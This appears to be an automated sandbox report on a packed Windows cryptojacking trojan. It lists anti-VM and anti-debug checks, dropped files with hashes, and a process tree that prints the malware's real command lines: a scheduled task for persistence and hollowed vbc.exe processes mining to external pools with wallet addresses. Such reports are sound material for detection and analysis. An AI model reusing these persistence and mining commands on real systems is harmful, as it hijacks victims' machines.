38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59

Analysis

max time kernel
298s
max time network
303s
platform
windows10-1703_x64
resource
win10-20220718-en
resource tags

arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system
submitted
05-08-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe
Size

4.1MB
MD5

35239580e14f6a36f65cdd1d38c6173d
SHA1

dc979f23b12c5665ae3d75559c749c198e86eb89
SHA256

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59
SHA512

ca9c74f2dc6b21cbadde6173f3d92ea4620e92942121af8b01b264ab32a5e2bbac2396f6b83aeb28e9c6fb8dbc80d5f95b429549320c74e51596c9fe94d207f2

Score

9^/10

evasion miner themida trojan

Malware Config

Signatures

Detected Stratum cryptominer command 1 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

vbc.exe

pid process

5012 vbc.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe
Executes dropped EXE 3 IoCs

Processes:

ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exeAZWZGASDYNOOA.exeAZWZGASDYNOOA.exe

pid process

2140 ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
4676 AZWZGASDYNOOA.exe
584 AZWZGASDYNOOA.exe

pid	process
5012	vbc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

pid	process
2140	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
4676	AZWZGASDYNOOA.exe
584	AZWZGASDYNOOA.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1820-162-0x00000000000D0000-0x0000000000A72000-memory.dmp	themida
behavioral2/memory/1820-163-0x00000000000D0000-0x0000000000A72000-memory.dmp	themida
behavioral2/memory/1820-192-0x00000000000D0000-0x0000000000A72000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

pid process

1820 38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

AZWZGASDYNOOA.exe

description	pid	process	target process
PID 4676 set thread context of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 set thread context of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2372 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4632 timeout.exe

pid	process
2372	schtasks.exe

pid	process
4632	timeout.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exeAZWZGASDYNOOA.exe

pid	process
1820	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe
1820	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe
4676	AZWZGASDYNOOA.exe
4676	AZWZGASDYNOOA.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exeAZWZGASDYNOOA.exe

description	pid	process
Token: SeDebugPrivilege	2140	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Token: SeDebugPrivilege	4676	AZWZGASDYNOOA.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exessfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.execmd.exeAZWZGASDYNOOA.execmd.exevbc.exe

description	pid	process	target process
PID 1820 wrote to memory of 2140	1820	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
PID 1820 wrote to memory of 2140	1820	38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
PID 2140 wrote to memory of 4352	2140	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe	cmd.exe
PID 2140 wrote to memory of 4352	2140	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe	cmd.exe
PID 4352 wrote to memory of 4632	4352	cmd.exe	timeout.exe
PID 4352 wrote to memory of 4632	4352	cmd.exe	timeout.exe
PID 4352 wrote to memory of 4676	4352	cmd.exe	AZWZGASDYNOOA.exe
PID 4352 wrote to memory of 4676	4352	cmd.exe	AZWZGASDYNOOA.exe
PID 4676 wrote to memory of 4776	4676	AZWZGASDYNOOA.exe	cmd.exe
PID 4676 wrote to memory of 4776	4676	AZWZGASDYNOOA.exe	cmd.exe
PID 4776 wrote to memory of 2372	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 2372	4776	cmd.exe	schtasks.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 5012	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 5012 wrote to memory of 5040	5012	vbc.exe	cmd.exe
PID 5012 wrote to memory of 5040	5012	vbc.exe	cmd.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe
PID 4676 wrote to memory of 3992	4676	AZWZGASDYNOOA.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe
"C:\Users\Admin\AppData\Local\Temp\38fdcea1a60613c5e0ac45985312b01e34f1b39b6c86caa99c19e3bd971a2c59.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1820

C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
"C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8DBE.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:4632

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
"C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:4776

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
6⤵
- Creates scheduled task(s)
PID:2372

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFiihDJ8WoynFyMePc1sP28nmxoLmatE9n.work -p x -t 4
5⤵
- Detected Stratum cryptominer command
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
6⤵
PID:5040

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe --pool stratum://0xd522E4e1279f59e64625757D66ba4Cbb20D6dC0C.WORKER@eu1.ethermine.org:4444 --cinit-max-gpu=80
5⤵
PID:3992

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
1⤵
- Executes dropped EXE
PID:584

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AZWZGASDYNOOA.exe.log
Filesize
1KB

MD5
9bfb0f51f319fb79c0bb1f4f9fcfc7e1

SHA1
367776be8a224b0ee8271dce1723eb675a1964b2

SHA256
35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

SHA512
0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8DBE.tmp.bat
Filesize
153B

MD5
65ff74f7520f5cbd4878d6c8ab0cfd69

SHA1
753579c05ed526154e28f42cc4aa28b808e3ff33

SHA256
beedc96307a4329586360fff5d9784c1995f31b0cf96e10b795a6c3c192c4fb7

SHA512
a7e3e6ff248e7240b3ecff3a5c3023477d14d07bd429591b879d2372d323190b30eb1cf7d45bc19b5e281b213bfe2f6e41bfe969703679d602472d923a0883e1

Download Submit
C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
memory/1820-162-0x00000000000D0000-0x0000000000A72000-memory.dmp

Filesize
9.6MB

Download
memory/1820-165-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-126-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-127-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-128-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-129-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-130-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-131-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-132-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-133-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-134-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-135-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-136-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-137-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-138-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-139-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-140-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-141-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-142-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-143-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-144-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-145-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-146-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-147-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-148-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-149-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-150-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-151-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-155-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-156-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-157-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-158-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-159-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-160-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-161-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-117-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-163-0x00000000000D0000-0x0000000000A72000-memory.dmp

Filesize
9.6MB

Download
memory/1820-164-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-171-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-118-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-125-0x00000000000D0000-0x0000000000A72000-memory.dmp

Filesize
9.6MB

Download
memory/1820-168-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-169-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-170-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-167-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-172-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-173-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-174-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-175-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-176-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-177-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-178-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-179-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-180-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-181-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-182-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-183-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-124-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-119-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-123-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-187-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-188-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-120-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-190-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-121-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-192-0x00000000000D0000-0x0000000000A72000-memory.dmp

Filesize
9.6MB

Download
memory/1820-122-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/1820-166-0x0000000077110000-0x000000007729E000-memory.dmp

Filesize
1.6MB

Download
memory/2140-189-0x0000000000250000-0x0000000000328000-memory.dmp

Filesize
864KB

Download
memory/2140-184-0x0000000000000000-mapping.dmp

Download
memory/2372-199-0x0000000000000000-mapping.dmp

Download
memory/3992-207-0x000000014025502C-mapping.dmp

Download
memory/4352-191-0x0000000000000000-mapping.dmp

Download
memory/4632-194-0x0000000000000000-mapping.dmp

Download
memory/4676-195-0x0000000000000000-mapping.dmp

Download
memory/4776-198-0x0000000000000000-mapping.dmp

Download
memory/5012-201-0x000000014006EE80-mapping.dmp

Download
memory/5012-205-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/5012-209-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/5040-204-0x0000000000000000-mapping.dmp

Download